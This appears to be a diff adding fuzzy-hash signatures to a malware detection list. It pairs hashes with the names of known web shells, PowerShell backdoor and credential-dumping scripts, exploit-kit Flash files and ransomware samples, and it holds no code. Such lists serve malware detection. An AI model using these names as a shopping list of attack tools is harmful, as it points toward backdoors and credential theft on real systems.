+96:aBzj3tbkc6/ZhiYmaVR+C0F/5oa+tXJrJCRYHy29MjIeRJNeEoBOkLsxANSh+/Ur:Cbtbk/ZhiYmaVRNtZdCyHB9MLgJ+,"38.php"
+96:a+59ROuqgnK+vVPkokbr9mldARC+2+C+qGJRVC+XhJdrYh7mKfSEaw:a+5vOuqmblkbadGC+mGX1Rx+vF,"bt.php.137"
+96:a0A12qS1/On8uxlZfYqDrCeTdqCzLKub/gB00fWLn/W9wPWpoRRQfwLWXWsARfsX:a0GWGn8EPrDLKucS0fWrWYWpMQ4LWXWO,"41edb32d349599e65f05de1958bc5372_php.txt"
+96:9pdUUfPUPBUihoyaLqyaLwpAeM/RAR9/44YKC:LdUlPei4+/g/DYD,"ExeToInjectInTo.vcxproj"
+96:9pcXfpUY1UYhUxAUxhoyaL7yaLqyaLhyaLICpAesAezARFARRCC:LcOYKY+xfx+CMr,"DemoDLL.vcxproj"
+96:9pcSfPU1UXUiCUihoyaL7yaLqyaLhyaLICpAeM8uAeM8RAR9/yAR9/4FgbC:LcTKkipi+C+8x8g/1/+gm,"NTFSParser.vcxproj"
+96:9pcrfPUPzUPBUiCUihoyaL7yaLqyaLhyaLICpAeM/uAeM/RAR9/yAR9/44EC:LcAPIPeipi+C+/x/g/1/DB,"DemoExe_MDd.vcxproj"
+96:9pcqyfpUP1UPhUiAUihoyaL7yaLqyaLhyaLICpAe6/iAe6/lARn/WARn/k4KC:LcqjPKP+ifi+Ck/H/a/L/nD,"DemoDLL_RemoteProcess.vcxproj"
+96:9pcb1fpULUzUaUboyaL7yaLqyaLhyaLICpAeHAeeARpARf4vC:LckQIRYC56,"NTFSParserDLL.vcxproj"
+96:9pc91fPUPzUPBUiCUihoyaL7yaLqyaLhyaLICpAeM/DAeM/qAR9/yAR9/44UC:Lc9SPIPeipi+C+/g/t/1/Dx,"DemoExe_MD.vcxproj"
+96:9pc8fPUPzUPBUiCUihoyaL7yaLqyaLhyaLICpAe4xPAe4x2ARjARp47C:Lc9PIPeipi+CWxwxxG,"LogonUser.vcxproj"
+96:9nJKFGMbzvVc7FckRJnJm3T3u9OlRWuEon5UqhWBiOL75reMn:9nARAHvJm3Du9OlrGD,"VirusShare_f27a07074503b286d7aa8a0666527e4a"
+96:9hdEVUv8h80wigghNBAIziSOE+OxSvV9X5S/cVL0D6TKy6FjsgLydTM:bdEVUxv3rS5+OwpFo2TKy0sgLs4,"bt.php.20"
+96:9C2eqW0NEVu1cnM54wfMc3s6zv4Xfj87O0Fd9VXE5y/1OXJsc:M21ZuUynM5XfD3s6zAb87pFZoy/1Dc,"2016-07-21-EITest-flash-redirect-from-fehehub.xyz.swf"
+96:8FgpLCQf3JzJuVGyrrcXQMcbkZXyXZRgg9EybRp:BluVGXH76EYv,"send.php"
+96:8eNncUQzvn4yDOmnjb9MhZqh2Oxt9OlQYcLaoK:qUy9GhZqh2SrFLaj,"Backdoor.ASP.Ace.cy.asp"
+96:7Tx/MRyK0qtHtc6o4oc6nTi9Locd4vwHWWTW/wOngyue5fBVbxc+xsgIJWoYR:7FkRyGtHWc6TiDe0bkhc+cM,"bpscan.php"
+96:7NhrvhINrqDbuXBdPWK34Qc183zqGdBEBAbwPCZonxLRUIixMDF/:jDhINrqDYrn28OQEBAkqybUIiml,"2016-08-22-EITest-flash-redirect-from-hybypi.xyz.swf"
+96:7hHAummhPoZbcHNWupf2y1D6UM7Vf97XFB4fukf1rs+cVLPns0cDrUupaLtZiNjf:9HrmwwZc1D6z19LQWFR500Yktl6lsPG,"bt.php.116"
+96:7d2Pu31SLIX/8X+Zv4X3NzPkrIMKy0ziQCg+xZpeV:7dYu3vv8uZv4Xnly0H+xZMV,"palen.php"
+96:6X/b6b5mBb5pE1TYr5bWJrGncKUwfejIMZjyVWUOdbjzFrwoD5eapkBNSUwEyd:6Xmb5m+y5aJqnToIumOb22exNSqyd,"64ee9e896c9a2791607a7371fb16b8f2_php.txt"
+96:6w69V716iWG4Wu92HUM8YzvVc75ckRJnJm3TNu9OlRzCuEonKqhWBiOL75reMn:6F9V716igWpXWHvJm3xu9Ol7uD,"class.rand.php"
+96:6VQue5ORVGdZU5HfE2GslHs10V8077rs1xdFC7CttA:66ue8SdZU5HfE2Gon77qe,"filesystembrowser_by_Mark_Woan.aspx.txt"
+96:6MKZ7I+ltajPyGMacqXMwJRfaCIgRQtCDUnqHpmbgSY7B4iHgRx3+:qZ7I+eyGMacqXjyCZQtCInIpGgBwO,"phpshell17.php"
+96:6jTRPjfn2WtJWMKUTGcEwgpEMAQggczybZGEGRa6OSoF:WPzHWyKCwp4zyFGjFO,"CLIOutput.py"
+96:6jTRPjfF3/PRk1czy//i5dkljiS0Cm3m23AazIL:WPhvPhe//i5dkljJnN23AazIL,"Fuzzer.py"
+96:6/DLHl81IfJXqgYLj2vFvMz48QvjCOGoQCEgvEtk6:2LHl81IfBkLgkz48QvjCOE9tH,"2016-04-26-CryptXXX-de_crypt_readme.html"
+96:6BxYB/+///8QP8shjBIAfO6IUhQagovNS+ydqf22qBz0gSeGDqTZDObs5hcSoN:6PYVWnVPnhjLfOE/g8/ydqf2Zz0gRTnE,"7d5690a27c7639215e6f2a5af641d536_php.txt"
+96:6a6JUDdwOG0qet1ZoazGfuakzVgsbzHwfcvQx5UhuLSxlL9rgQ/KCFA/b:6pUDdwOG0FtPdAuaIgYzQfB+rxlLiAKp,"Invoke-Encode.ps1"
+96:5+FK++RpsY5roc1vTwc8vXRdjUvpklznxonxTZsPiUOoroZAum7sLLHTi:5GFY5DvTIb/H,"ADS_Backdoor.md"
+96:5bDmADLc3A0yqXHTybEj2uwHQDDJWWiAy9V2NA/O1qe3vs8zPY:kADiyqXmbs8Q/cHAy9hO/pzQ,"phpshell.php"
+96:5AVZw887fhNz90ekS+vcz1lbkTuk9C3h4j5ESEYdr:ud81590ek/82ubOYU,"wordpress_malicious_code_added_to_functions.php.php"
+96:54hsMO65SrNiL6iIouaTFJAs+oEbVihkGS0ryuG8QqKQIj1v1pg:54hsMyp46/ouaTQseVS7OuGBDVM,"vectorlist.py"
+96:4mMaI90HObW4cMiL8sZKq7McpMrm8bENenn8sZKq7McpMrm8bENenfRpsTbwGaEj:BMaI8/o,"ELBO.config"
+96:4LXaiDHYia5spJIJX6iD9qRC1Eoh4BOrwSMzxs:4LK+440X6u9qKz,"cmdshoww.txt"
+96:4LXaiDHYFa5spJIJX6ii9qRjm1Eoh4BOrwSMzxs:4LK+V40X6P9qpwz,"novo.txt"
+96:4KqJXLobaT/GkV2KOvX7lOZ5fiLe82AVfn5+D3:hOf/GklOcn6Le8nlnC3,"spam0202020292.php"
+96:4GJhFdSNsdyv/tmrmpYxKpyhjPyktDZC/IzPL2Grh5WmBR/n85M0BGYhsjnUgYhZ:lFdSNlejPLScpQHiiQnwwR0Zauay1MA,"bt.php.111"
+96:4E4pFUaKWajtvZxu0792AG+u0bSp59TtRuZG6lZpA:4E4pqaTAtxxuo2AVBbQ5dPulpA,"MssMFA38B4Pe"
+96:42+u08REiPr7PiE08B8j8bE08F8bVgNCijAciEBiiuj4YK70+CUVX3CAMt:y2PnPiSBCMixiEBiaQUVyt,"LNK_backdoor.ps1"
+96:40B48YCtFhS4dCToF4tjHae3ksrE46NRcrppt8u5sLy+I+LTVczJnhAu7d:40JntS4so2tj/3p4dC2Ly+bLK5Zh,"preg.php"
+96:3Im+9cqP2fzYuFqOFzOgdKr1EuR1w40D3EDYTQ7NPAb3mL3AMXWaU:3ILZWYujop1Euvw407UY6wNJ,"Schtasks-Backdoor.ps1"
+96:+3figXnyHUi3+urueCk8ohLiqnKitO56QizRLdCPWqbY9eJS82zt1CuGvgDVen:+vikyHZuuFqQtpQiznOWuIeJS8ktUYk,"Rachel.jpg"
+96:3aOVkaOAlhhQih48/6AarnajPC73wO5LnVEbM2dG8JVLbpIE9Pn33wEHYrhFhFhj:31C1Aplf6HrLVwzIcJSQN,"company database.msg"
+96:30LqcGbeQXsdSBkb5fj7UDeU6jgLO7PZFes/U2IeI3+WyuaPBkaU3n8+9AMWn:8sXsdSBkG5qLxkr2xI+WyuafkJ9AMw,"bt.php.39"
+96:+2Ov+eaxrTx/3Vyv6abiOFce/4ts5zyjkvR3HE9nqn/OXh6LC5NQEeyOUlf:Zea9xYLpceGuuk3HE9nqn/g6LsCi,"saphpshell.php"
+96:2jz6J93LNcaGOnGWWExw306GKGaB0Gom/AHKddddddddYinyQMliHD+zFPGcIsDv:4zi5avCXI/oHHUgIsFyO1,"mssql.aspx"
+96:2GE7xcq4WTjBumdKK3RbaWH9DaLcuEKdSxOK3uwnWJFMUE:2x5kJKhbaWQjDJFMh,"cat.Jpg"
+96:2cQkYfHmb1nklvFLfpRk7jhgb1Dwrf1bHzwK96n0D:2cQk6oWX3opUy,"Sincap-Shell-v1.0.php"
+96:2cQksyPwJzAld9/DwUmFIXsKuINdAsKuIqAdAsKuIyTHoIQmIM1dIFIM1d1W:2cQksDzK1XsKHwsKHqhsKHK1Q/MHIFIN,"WinX-Shell.php"
+96:2cQkbaU+GcQkpoQ86oHmoOJDmGeSjWjxMOPTrc/:2cQkbaU+GcQkpNDDjWjxS,"kaushell.php"
+96:27kV37k87kya77SB57k457kD7k5a77Se7kc57kz7k957kU7kaa77S557kQ7ke57J:HvuxuJzUHYfvuxuJzUHYtRAD4vxqN62,"allnet.jpg.6"
+96:2253J/1OcCFAJoDZP1JiB9EonNC63RJ4MKm0r4xprPr2RXzvqn2QiOupKuXHv6:JUXmoDF1Jj63XZB0yFTUjvk2TeuXi,"meter_rev_http_service.cpp"
+96:1w51DUDdSJ5PAtakZdVguuPLAMrMIDk9MrdM5oFrzNd:1w7UDd3tauDgNPLAMrMID+MrdMsrzNd,"Out-DnsTxt.ps1"
+96:1VwU7+SPCAtFm2Az4p/ya1UoylgaVqThyu0fYOxW7j2soetMyIYUimbYpuRwPZTD:wU6s/RC4dpDj2MOyvjuCP0E/Bisr,"Get-LSASecret.ps1"
+96:1jFL4eBxPkbYFXAiAlNNxTC00VHj9wKCQU+RJwedYx:1jFdBlksNAiAr+00M9X+bSx,"SimShell_1.0_-_Simorgh_Security_MGZ.php"
+96:1jFL4eBxPkbYFXAiAlNNxTC00VHj9wKCQU+RJwedY7WIlIXv:1jFdBlksNAiAr+00M9X+bS7WIlIXv,"SimShell_1.0_-_Simorgh_Security_MGZ.txt"
+96:1jFL4eBxPkbYFXAiAlNNxTC00VHj9wKCQU+RJwedY5:1jFdBlksNAiAr+00M9X+bS5,"SimShell_by_Simorgh_Sec.v1.0.php.txt"
+96:1fU+MS8IflS+Rwppk6PhZbds8CP/u0wXrDL52eYq:1c85edEWiq,"Sincap 1.0.php"
+96:1fbLVtdddddddddddddddddddddddddddddddddddddddddddddds7dddddddddY:1u+VYciBM+dUihCbKWIlIXv,"s72_Shell_v1.1_Coding.txt"
+96:1fbLVtdddddddddddddddddddddddddddddddddddddddddddddds7dddddddddv:1u+VYciBM+dUihCbM,"s72_by_Cr@zy_King.v1.0.php.txt"
+96:1fbLVtdddddddddddddddddddddddddddddddddddddddddddddds7ddddddddd3:1u+VYciBM+dUihCbu,"s72_Shell_v1.1_Coding.php"
+96:1AIjXNHutuHzhisVNkudGQlP/xQTevot1uOAlG2jzH9TlKpwLF4PWguX6ELE:SIjXNouH1PPkudGMP/xcaOAlGEhcpwLE,"coke.php"
+96:1AI0XXHuIs1sGhhuHzhisVNkudGQlP/xQTevot1uOAlG2jzHdblypwLF4PWguX6z:SI0Hv6HXuH1PPkudGMP/xcaOAlGERop/,"bot.php"
+96:13bdkKMf3lbvq75TqkU3VoTxeK27XsEo0nepytHM:1ZkZf3Bvq7wkU3VoTA3sEo2RtHM,"VirusShare_5db32fe550107ce4352ec6d1fdef0738"
+96:0u2oTnuSIZyvMaD9N4DJAnjpPyLrSLpTo/IUj/J:0u2KuSxHYGnjpPyMTowUJ,"top.php"
+96:0NwsFRFyBMAbwATW2k/RVwJhIZVb76DflKDeajJik24:fsFTyBTliQhy76DflKqajJij4,"file.php"
+96:0NwsFMyBMNEdMdFATW2y/RVwJhIZVb76DflKDeajJik24:fsFMyBCul4Qhy76DflKqajJij4,"file.php"
+96:0NwsFMbo8yBMNc4Md1ATd2y0kyq9RAT22I:fsFMbxyBbechcReFI,"host.php"
+96:0NwsFHcyBMNc4MdFAT3z2y03TyNQet9dFAn0zk2I:fsF8yBbu3ah3gfLXI,"dns.php"
+96:0NwsFHcyBMAgAT3z2y03TyNQet9dFAn0zk2I:fsF8yBZ3ah3gfLXI,"dns.php"
+96:062DzVBywe70F2ORUv2uKl8wF2r6OnMqhTGKVvOv1TOwnIJ+Z9ut3vIbtGd9By2:0dVcq2ORUv23KwIrdJVG+GdErtgbf2,"bt.php.151"
+768:ZZuTUEnIklZxzBeHb60eKGvwigCjCb6Re7AW8eaxiutQLeCRDgJouNx:vuT1nIkPxN4reKGvwigCjCb6Re7AW8eQ,"zehir.txt?"
+768:ZZ2PA5hH9Yn77UDnZ9JMwefGzvq+M9YsEqdWZwcdUekxZLN9+G2fUMmvGSq+X:v2Pi27QwcqpYsEqdAHdUekxZLN9+G2M7,"zehir3_03_by_zehir.asp.txt"
+768:ZZ2PA5hH9Yn77UDnZ9JMwefGzvq+M9YsEqdWZwcdUekxZLN9+G2fUMmCGSq+E:v2Pi27QwcqpYsEqdAHdUekxZLN9+G2Mt,"zehir4.txt.1"
+768:Z+tXY2RoHySXXFvKRfmCKQJy2LC92bE9le3+OXq1gV:MtXYzys1vZeIbe3ra1gV,"404.php-3"
+768:zr5zh6OBNbR8FE3gJZ7qoY7zMsjlWvQGi0fKaXRJLF01VSMO:/5zhVCvba7QsHvipXTUVSMO,"灭天远程管理.jsp"
+768:ZoMlJsQCB/kBsmYZm1Z09gr+RuaXLtWKnUTwEk8PjSxhG9AVXT:y5/zmYZmfFKnOO8AVj,"mild.txt"
+768:Zo3EYqJWVQPVG60y7+dqRzvxngs2M1wmiy128IwSByl9L9Ot6P:siPwGRjwmi8wBylg6P,"jsp-File-browser-1.1a.jsp"
+768:ZN0nIkZ9lbTmxsC6mE5AJ5OAA2lHe23CV46dI8sY8r:ZN0nIkZDWsmE5AJ5OAA2Re23CCQI8sYm,"2016-05-18-page-from-hooked-on-nails.com-with-injected-pseudo-Darkleech-script.txt"
+768:zMnI2zrp1o6fTplkSyuJd/3Q4Awoc2tKjP7/qOAJc9sRG/ouB9XjgbBSmQA7GsZ:YnI2rFbprygZGAveDRG/ouBpkImQwGC,"simple.php.1"
+768:ZfLT4yEDf3/z3pEfiyy76Cr8cpi1t5Ln9LBDk7s0OGVA9nwj7uIUCWNr95S:Fb5y76dcpG7b9LBDUJOkA9tIU,"WG Gutschriftsanzeige zu RG 330253  5716301 Arvato Geburtstagskarten Art. 99647.msg"
+768:zFipl1NCJ2s5AtaRpCeqEPFCPVH8I7xqnRMiVNIEhkbX3s84WwE4N1EEwidTOv8p:zc1cNQJiA8H2A,"c99.txt.1"
+768:ZEvfEbombHsSoACq1Z+H0jRaSHMEl9fNFxWihW:ZEvgHToACIwH2RaSHMEl9lWQW,"2016-03-29-page-from-wefitsolutions-with-injected-pseudo-Darkleech-script.txt"
+768:zeRHinL39XIk9InNk/8YooL5xeDTAWn7pF8v4HHMHnoT0abhREWqIoW3kM8D:zeRHinb9T9InG/8YL5xeYWn7piKOnMh4,"Trojan.Destover-Sony.zip"
+768:zd1LllF7vA8IAXtfFZf0PbDL7tnRMYNe4iKJlEAeGle3Tz6OT:zhrAmXtfjMPbDL7xNTHlE9z6OT,"sadow.txt.001"
+768:zBROTOuzk98HeRbx4WlQ5MpnNNNNNNNNNdNHBvg1tSvh:xuzk98Ha4Wl/hNNNNNNNNNdzvg1tSvh,"2016-02-22-page-from-compromised-website-todoimpresion.com.txt"
+768:z96g/hix3+L+K1u2qiULi+pV+xpOio4wggAbK:z96gZq4O/upu,"erne.php"
+768:Z5w1Cqv+hmjCeTTN9E3Em4PYCBK475aAt3e81ZFL+x2guNI6ST/e:DHm+hmjCrt4xK47wAtM2guNI6J,"manage.cer"
+768:Z5m51DnR9H9P3Mciy6xi+9A+fBWpb93KC6CXzhX+EQdawSiEVgqgUdGRBneSYMIb:Z051DfH9P3M39vcpbtzwtEK3CEiMIPD,"666.php"
+768:yyx/6LtjDKhDYkxK88gqOf5S7vva2WFJSJuY:IxDVk18gN5S7vva2N,"eb5c77313703961445c8cdf1c8f4e55f_php.txt"
+768:yYJshVvLZYquFjVfjhqjhYFGO4DSnIdYK4BTBEKcwlX+IF9m7xOS0:yvhVvL6qMjVfYVtO4DSnJLm7xOS0,"webadmin.php.php.txt"
+768:yxfQN1SISAzHGdp1qSKSESZStqRsN8trl2NGs5wsyHkaW8hoxtpDZjk7ndVjz:yG1SISArrSESZStq6yp2NGs5wsyEaWY5,"PHP Shell.txt"
+768:yUsZ2bMfRDR3ffffffYfdGH2CRUt32RUK1RUuByQTzc1v:y0Mf9R3ffffffYf2RU4RUSRUVv,"PH Vayv.jpg"
+768:ytUAZE8U1uKRtZjL1429CzPTA8Nf4Ya4dULdNaoEjNqaxMk/AMKEufx:AUAc1lRT1tUPA8eD4voEJ5x4Eufx,"goo.php.001.001"
+768:YrJaAQHxCzCqYNgYisy7klMOITEAzuXVjQqgFUaS2GjhSbl31/xb3WRev:Y1aJLNgY1NIrCXVEHDSrtSB31/xSa,"qlzRkxJ9NR71"
+768:yQFMz86AAnJcxyDzkqN9C2GUiEBLlO0PzcStczfW:yQKIAn3DznN9C2GbErUzfW,"kd.php.~1~"
+768:YOmjJLyx5nkpGTZvAzd3q9XMT5Df5qt5q55oN7In9uviM6DwszOMt:YfLyx+pGTZv0T5tEG9uvi7Dt1t,"sa.txt"
+768:+YnODIyq624UUhIgBYU5Gkg5nFB1ZaewqQHuL3gICcdW:K24MgBng5FEewqeuL3FdW,"file_browser_by_Boris_von_Loesch.v1.1a.jsp.txt"
+768:yjJjQ75ul2jXeNu2aMhBuxG6mqvFvAqLUQ:y1ieNu2aMSc61vAqgQ,"Webadmin_Priv8_by_i3lue.php.txt"
+768:+yJFJQYyFGRa90LuBzq73axt8W5XqQvSe9HkfWHt6uJ4Cw74fsSBUUfcOgi:+yJFKiRaUwTxmuqQxmeHt6uJ4Cw74t0I,"dicc.txt"
+768:yiR3EJXvOiMPX6gJ9RYoQTVqDf96Qctt6rpdgTLuTDQc/vk1yZ4Y2qGsAins:yO3aOiMPXzJvwVqDluOgTLuTDQMvk1Oc,"2016-06-02-Angler-EK-flash-exploit.swf"
+768:yH/lZoN5wlWsFNUFE/9KZNGmQAvvIT+jaK5FIu0b:yQDwloFEcZN3i+jag+b,"7ca857d86ead293d7a61e84b28add6d4_php.txt.orig.001"
+768:YHJG8uGvs3I8uFjdpNhqjh4q4C6zSNPPdImo6HKkULmWpAxzwxOll:YonGvs48MjdpCVeC6zSNCiHzwxOll,"bd0bf3f1a7d5dc1f66aa299b101a498e_php.txt"
+768:Y8LaxAZNT71sl/IKdMBETn8nJhpB2mGx/GP/1C1gRhRRXaOWLjMBXFUx:per5n83pB3QMQGRXRFix,"2016-08-23-pseudoDarkleech-Neutrino-EK-payload-CrypMIC.dll"
+768:y7SkLywTTvO9m1I2ED0CHmP7K06w7Sh5tUiE3wq5+b7pOCZ/POYTI/V:CXzLPWKSh5tUiaub7ZZnOYTeV,"ma4.jsp"
+768:xyF7qElNd1j9D+c9MU9aN7Z4UVLxC+jtHWcOgvGdH5JD:x0qqBocufdZ1N1HV1uH,"2017-03-10-Spora-ransomware-all-4-runs-Chrome_font.exe"
+768:xufZosq80nF55sZRtSguiiGC86XVhPRjF7ZOxsSTSCugFTCxI0lib4AQkduBhtnD:AZK2wx2sSTZTCxI0lib4kINN,"NIX REMOTE WEB-SHELL.php"
+768:+xUEgEFlbmnengsJfXwmcy5XeNc9GGJDohBWqmErZhz7ZGAlbYfGxbXI2IxhYcaW:+WEgEFlbmogsRwmcy5XeNc9GhhBWqmEC,"2016-06-28-page-from-gennaroespositomilano.it-with-injected-pseudoDarkleech-script.txt"
+768:XOm8NQHsUTJOjYRbdooLlcf7kj3ocMSQtVRUpHvuBBtXClNjcpULcXneCfxn5IEa:XORqMUTI+dokcj31Bt8CfxnCE8Z,"Trojan.Bladabindi.zip"
+768:xmFVRef0kolTnlBfhiGxmVytlhGB6/h4WZHo15wzc+X1k08L6Cim2:xiReAtnlBJiQc2oqHewI+X1Gjim2,"log.php"
+768:xGS2Gz8iAfFdBg5RWGXdjCka1yDpp8r1wbJzlNN5uuy:xGyQiAfFdBxGNjda1yA25lNfuL,"木马帮V1.1-火舌版.asp"
+768:XeX0Buj1uQ8ckpsf3yWGV1YnuuEuuqWVJ/ATUxb3ZNeOfuM/gPUjWPN5v:XeXYuj1x5kpsf3yWGV1YnuuEuuqWVVAF,"d6e70605066657c81ad6b99009d7a5cd.php"
+768:XeX0Buj1uQ8ckpsf3yWGV1YnuuEuuqWVJ/ATUxb3ZNeOfuM/gPUjWPN5n:XeXYuj1x5kpsf3yWGV1YnuuEuuqWVVAV,"code.php"
+768:xbJShGt1QJysFK+DL0gv3xjQnLiuJMfUDIAs0TPEKF76X+sjp9pGo4G8:xghGt1QJLFK+/0gvBMLiuJMfiipGo4G8,"EgypT.php"
+768:X9ymD3VeZI8UHsKUHmK+/GUjqExG6WtGHn:X9ymbgmHs3HmK+/GapG6tHn,"leech.php"
+768:X0i7A6xuC98booxBX3UoyHLcTAakR6zb3DjMOtGV4REmLWbrpRwnaRb:O5AD6EIUCLWZRwno,"Backdoor.ASP.Ace.da-蜗牛工作室专用.asp"
+768:wZzwQHSZZ6bA4vybsshrlFRP1TcbGLlv3L+pue:wlHSClvybsshrlFF1TcbGLlfL+1,"sep16-9.txt"
+768:WYrMnHNAUfiktSSkEa93PXTos7SH/K/+bnj:drMnHNADktSSkEe3PXzSTbnj,"Gamma Web Shell.php"
+768:WYeTOOh4GzpNhkBJaIbpseE1oPD447T8Gjcj4tDtBrfHQ2t8IPgzGo:Jedh4YpkSneYoUOcj4DtBrfww4z9,"2016-06-02-Rig-EK-flash-exploit.swf"
+768:WXd52IWn+pjixJNARGkpi9QrSmoo+f1deCyJp7O7SMBGczS8t9uowlzWcMnsVzfl:WN5bcJN4rrUoXOSMBGWt9RwlPZ+ewU,"2016-03-21-other-Angler-EK-flash-exploit-after-localtasteblog.com.swf"
+768:wWLBycZtF1xKYSZ/EPWff8E/HC+EAxB0N5x5yk02ETvdUQSpjLVKZBBYDp8z9:ZBrrmY2EPYFbpUXmL/DtSJLqUGR,"mal-shell2.php"
+768:WQX5R3zSBzc5HO78wVg8/mmm3UViGaJK2Qn9qC4WbVOx+6YSJKhR3DO+AU:B3+kugwVh/mLbJK7qC4WbVsYSchZFAU,"2016-06-01-pseudoDarkleech-Angler-EK-flash-exploit-sample-1-of-2.swf"
+768:Wocv0g0vMDCk9VGfuQll0wbvteRWTje5u0cf76ClYEP+svU8fYq2N0hruss2umYl:W3v0LCFyfuItbvteRWTje5u0cT6COEPA,"dC3_Priv8_by_Bl0od3r.v5.0.php.txt"
+768:Wocv0g0vMDCk9VGfuQll0wbvteRWTje5u0cf76ClYEP+svU8fYq2N0hruss2umY0:W3v0LCFyfuItbvteRWTje5u0cT6COEP5,"dC3_Security_Crew_Shell_PRiV.txt"
+768:Wios+9vE9nsi89Kfdxlnjxq1R65VX46JOchZ1ufiwuwIfm5OGmD3LKPh1LZy4O+B:WIZsWfDlMq9rJ/Z9VwYomDah1LZbR5vB,"bad.php.40"
+768:wC3xKqXZNr1zAbV/R9x1DE4uQncG9zHKKpbQcZy:XxzXZNrdAZR9xVEVeX9sL,"MyDoom.A_Jan2004.zip"
+768:wbq6M4EPr933fQ01dRyRJUMHDel90QKoR6AIvxzOTaT4CbtA+X//a:wG6MZf3jRyRJ0034/IvxCTvWzPy,"2016-08-16-pseudoDarkleech-Neutrino-EK-payload-CrypMIC-after-lenheim-lodge.com.dll"
+768:W6mXp+RgUwhJLqmXp+RgUwhJLBEqCYyuZIT83M9qLsJQDnp2gEV3eiBu:9mXpzpLqmXpzpLBhCCiTgrsWw33eiA,"06_in-img-obf.php"
+768:+w5DQrcbylu/K7snSK0d9b5Gf33MB1B9+ULNfbrteKpUXTr3Lc:+w5DQrcbH/KwnCUf33M33fbrUPXTr3Q,"devilzShell.cgi"
+768:w0RYZE60YIXMFk9RiTqyccgQS9ZorHc2hujziAJfcEafHDdOIPBf:w0aG65IXMFXD0QAsdhIGlFPB,"2016-02-15-Nuclear-EK-landing-page.txt"
+768:W0lofQ/QfWtq2FNbMnaFBebLlKx4f5AHPRt0aFLHhpv9GgYLoy+nalFiILtq2Mws:jqLcHv,"2016-06-28-pseudoDarkleech-CryptXXX-decrypt-instructions.html"
+768:vxYwmqOW3u26QhHEx7dmEKhQX2V4E8xVHx341Ft:vGfqOWe26QhHExZmEKho2V49xVHy1Ft,"2016-08-17-page-from-agreen.com.tr-with-injected-script-first-run-pseudoDarkleech-and-EITest.txt"
+768:VxfidS6SwkL/0V0KSMSYSUqm2pTYrYJxMsxMsEQvJ8SV:2dS6SDKSMSYSUq1OsJxMsxMsEWJ8SV,"safe0ver.php"
+768:VxfidS6SwkL/0V0KSMSYSUqm2pTYrYJxMsxMsEQvJ8SO:2dS6SDKSMSYSUq1OsJxMsxMsEWJ8SO,"safe0ver.txt"
+768:VVfG0bN20QJwqH1/yEXXERdYX6cAAImDp65A0sT65DXSje2lqIqDtnEW:vfG0BBKVJKJKTp+sTUDXaqIqDtnR,"r57.v1.4.0.php.txt"
+768:VTkQV+rH+9OBp493WdafYvCXdYRMO++PhvttRnyHuLLijF:VTkQVue9OM9Kv6GCGPxttRnyOLGjF,"56520a9126b5ae4dc7f6c8f4d686f4bc_php.txt"
+768:VrTZnQbtiCbDy0r3LnT0/vZ9IA4yCPa7Jo:3QcCbDW/XIU4a7m,"clones.txt??"
+768:Vq3/ZZHA7pKkgFQVj6yxXWbKI7SZOMDL0pCx6T6m8hn99iSzU9sMvZEYMD+O5Ng/:V6/jHwpvgFQ/XWOI7SXDLWCxu09ESozn,"2016-08-17-EITest-Rig-EK-flash-exploit.swf"
+768:VNLbrXiv66Ca7XxfmbBg25cRGNQv6WGLU:3Laea7hUWR6QvLGo,"mod_ariimageslider.php"
+768:vf3ff8SISE0LHw/8WSESCSaqAmb1UrQL9wsTwsYetLGtUR:8SISlKSESCSaq3W8L9wsTwsYqLGtUR,"Safe0ver_by_Evilc0der.vBeta.php.txt"
+768:vDkMiMQdXeytmnP6kBBysqVq41YDYLy1N:rkMiMQdXeytmny8k5BpEN,"dabao.asp"
+768:Vau8sWN9xpFdEZQLyJjTP4EuRzRwQsUqTa03X/:Vb8skFwQLyJjTPCRBho,"b374k-2.2.min.php"
+768:+v9HxFiGjQrjlgR7U6SQufT/WeriecJcXs+u3OLAfJd3FqG5miWD+g8y0D:+v9HxFiGjQrjlgRA9hL/rriewU1qSKjt,"2016-03-29-page-from-macfly-studio.com-with-injected-script.txt"
+768:v5qizIEPSRpMX99OLEgkCqDjeGlkRTpnz65:v5qi8EPkpi9OLEgkCqD0nz65,"bot.txt"
+768:v5pcxBs9oP7z6nDEEgTgMHpNJ50oTgYaT2iVU1JscWa7FyZXlLtvTGB5i:v5Is9ojz6nDMrDTxaTXVUVWUFkM5i,"PhpSpy-2006-最终修改版.php"
+768:UyCLAcEYI0dnXIPVG60y7+dqwbsLuBB0HaQipvxnfgrPMEiliGfl+8L6/HYRqLy:i4PwGwbx0Amildo8ULy,"jsp-File-browser-1.2-201.jsp"
+768:UyCLAcEYI0dnXIPVG60y7+dqwbsLuBB0HaQipvxnfgrPMEiliGfl+8L6/HYRqL8:i4PwGwbx0Amildo8UL8,"jsp_File_browser.jsp"
+768:Ux/GVo59HerFc194qAd+hcJnb02oEllgrw23gTcH:U1WW9Heri1WcSDoOlgP,"mssql在线管理.asp"
+768:Ux2Rb73bk1pg2IPv3As4aR55DLoNwem2XAkLawcg1:a+b/k1pMNhBXQwem2XzcM,"other.php"
+768:UwiVMUQsxtWfVmB3HzhoxpeTAYGbNZR55t9oh:tiVMjOsVeErq,"erne.txt"
+768:uWiPHSYgXcw+2rf4Ygj5YkWaAnKj8fGfD+Mz4CbdomrXbPcpV1pgWV:uWiPHesSgjWax8+L5z6m3ErIWV,"2017-03-07-Sundown-EK-landing-page.txt"
+768:uubuIOTQ+27P97k25OfvieE1UEXvmLvp43+bjQ7XRZ:TSxTn2btk25OfvieEiEy/0Z,"self.inc"
+768:UtcUPD1OS9k7YoFdFYyZr0rFZQgtyzX7pXyCJLFp2mtgZbdn5FhAf:ScUPxOikscrAFmUyzLpiGviT5FhAf,"Nexpl0rerSh-v3.4.3.BL4cK-newsh.php"
+768:USV86mgOzd8qBybWBLrKXIrdTql4PnaUxLl4v2ZgM8/sGxsPNi:USVYgOhXMI31qq/LlxZgMcs5Ni,"2016-04-22-pseudo-Darkleech-Angler-EK-flash-exploit.swf"
+768:usIOTQ+27P97X25OfvieE1UEXvmLvp43+bjQ7XRZ:PxTn2btX25OfvieEiEy/0Z,"lock.jpg??"
+768:UrTZkQbtiCbDy0r3LnT0QvZ9IA4yCPa7Jo:DQcCbDWQXIU4a7m,"cvs.1"
+768:+Ulm4OcZjTVow/Vc3IqmELr1yX9IR4C4+XLSi7vAdAX8fejfcZBjLGTrgNjOiKK:+Gm4OGx63d35XGirACX8fwEZBjLGYNCY,"Emperor_PHP.Bot.v.edition.sangatta.php"
+768:+Ulm4OcZjTVow/Vc3IqmELr1yX9IR4C4+XLSa7vAdAX8fejfcZBjLGTrgNjOiKK:+Gm4OGx63d35XGarACX8fwEZBjLGYNCY,"Emperor_PHP.Bot.v.edition.parepare.php"
